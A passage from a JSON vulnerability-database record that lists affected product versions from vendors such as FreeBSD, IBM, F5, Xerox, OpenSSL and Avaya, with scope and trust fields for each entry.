"scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93030" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5755061.132.224.35203" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl 0.9.8zb", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7225072.030.134.32804" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x31002582" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58450" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5845072.060.134.32804" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5740061.132.224.35203" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "87000" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35307160" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087180" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "66550" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78550" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "hp-ux b.11.31 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408956" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93010" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8807903" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36305466" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7845072.040.134.32804" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x4407917" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36505460" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087220" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "storage server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "79700" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7970072.200.134.32804" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7220072.030.134.32804" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9303072.180.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5735061.132.224.35203" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7855072.040.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6655072.060.134.32804" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { 